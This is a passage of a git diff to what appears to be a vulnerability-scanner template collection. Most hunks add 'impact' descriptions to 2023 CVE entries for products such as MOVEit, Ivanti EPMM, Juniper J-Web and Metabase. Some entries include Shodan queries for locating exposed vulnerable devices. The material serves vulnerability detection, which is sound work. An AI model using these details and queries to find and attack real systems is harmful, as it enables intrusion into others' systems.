had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 2ffca5bce9..1bbded7087 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 1e64f4fdc2..4a5d69301d 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire server. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index a9a15f76ed..fd27d2d085 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index f94c51bc81..c03ae99f00 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to a patched version of Gibbon or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 9d91847c33..2b4c546afe 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 08f2b0d5c8..021a2783e6 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. + impact: | + Unauthenticated users can gain unauthorized access and perform actions with elevated privileges. remediation: | Upgrade to Ultimate Member version 2.6.7 or later. reference: diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 6ba3496b13..bf89a72caf 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor. reference: 
diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 964713c327..07922a7043 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Hestiacp (1.7.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 8564178b1b..9f4b6e7861 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -6,6 +6,8 @@ info: severity: high description: | traggo/server version 0.3.0 is vulnerable to directory traversal. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 95c7985429..fdf7fe6d78 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 692c37e8b1..c7957535a0 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -5,6 +5,8 @@ info: author: parth,pdresearch severity: critical description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability in Endpoint Manager Mobile (EPMM). reference: diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 63c61a2709..34e9650523 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain. + impact: | + Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions. remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM) reference: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 94e5fb7d71..0905ba7d1b 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -6,6 +6,8 @@ info: severity: high description: | NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database contents, and other confidential data. remediation: | Upgrade NocoDB to a version higher than 0.106.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index bdcdb2df02..7de5f8a012 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml 
@@ -9,6 +9,8 @@ info: has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data. remediation: | Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index e7072f1c3d..a0f0299e09 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Cloudpanel to version 2.3.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 2c8b4321c2..70179033da 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 34f72b85e7..1b75b16f67 100644 --- a/http/cves/2023/CVE-2023-36289.yaml 
+++ b/http/cves/2023/CVE-2023-36289.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index af4315fe56..27e93052b1 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -21,8 +23,8 @@ info: epss-score: 0.00075 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: codekop product: codekop tags: packetstorm,cve,cve2023,xss,pos,codekop,unauth diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 8ed170acac..2a87622f33 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices. remediation: | Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index aea29fd87a..1445367d8f 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. reference: - https://vulncheck.com/blog/juniper-cve-2023-36845 - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 118cb4b175..5a90d38408 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, modification of data, or even complete compromise of the application and underlying systems. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the MOVEit Transfer application. reference: diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index f337c7cc4c..df8c2aee73 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. + impact: | + Successful exploitation allows unauthorized access to the CasaOS system. remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad 
diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 3ac1552273..1bd7fbcd1d 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. + impact: | + Successful exploitation allows unauthorized access to the CasaOS system. remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 9b750d38a1..754febe701 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade to a patched version of Piwigo or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 95a26e8c2c..c7d3ffef52 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. reference: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 5f92caf6b8..f04b0fb594 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index d314d95df1..9c2fdc840d 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server. reference: - https://www.exploit-db.com/exploits/51598 - https://nvd.nist.gov/vuln/detail/CVE-2023-37629 @@ -15,8 +17,8 @@ info: cve-id: CVE-2023-37629 cwe-id: CWE-434 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2023,fileupload,rce,opms,intrusive http: diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 862b78fda7..8d8dfd2690 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 9bdd851be7..bf15c1db92 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the system. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index d07e06ee53..7351f9d593 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 4cd377a030..02098b42d9 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network. reference: - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials - https://nvd.nist.gov/vuln/detail/CVE-2023-38433 @@ -17,10 +19,10 @@ info: cvss-score: 7.5 cwe-id: CWE-798 metadata: - max-req: 1 + verified: true max-request: 2 shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' - verified: true + max-req: 1 tags: cve,cve2023,fujitsu,ip-series http: @@ -45,6 +47,7 @@ http: part: body words: - 'Field Support' + - type: status status: - 200 diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index fe6379c9e0..26ec8ee7e8 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index da9a7514ac..5b2a90f346 100644 --- a/http/cves/2023/CVE-2023-39026.yaml 
+++ b/http/cves/2023/CVE-2023-39026.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component. + impact: | + An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway. reference: diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml index aa08469889..55c9bf6e9b 100644 --- a/http/cves/2023/CVE-2023-39120.yaml +++ b/http/cves/2023/CVE-2023-39120.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system. + impact: | + An attacker can exploit this vulnerability to view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-39120 diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index f3eb0f6d0a..e823ac3efd 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index fcebd250d2..13bdd0a7bf 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of information or remote code execution. remediation: | Upgrade PaperCut to version 22.1.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 8857a4662c..ad95e75168 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Blog2Social plugin (7.2.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index ddd9e6365d..27d9d83e2e 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -6,17 +6,19 @@ info: severity: critical description: | Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg - https://nvd.nist.gov/vuln/detail/CVE-2023-39361 classification: - cve-id: CVE-2023-39361 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-39361 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login to Cacti" tags: cve,cve2023,cacti,sqli diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index c8053aa70f..f8c0e14cf3 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml 
@@ -6,14 +6,16 @@ info: severity: medium description: | Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. reference: - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 metadata: + verified: "true" max-request: 1 shodan-query: title:"icewarp" - verified: "true" tags: cve,cve2023,xss,icewarp http: diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 69013a9270..8ae798836d 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. reference: - 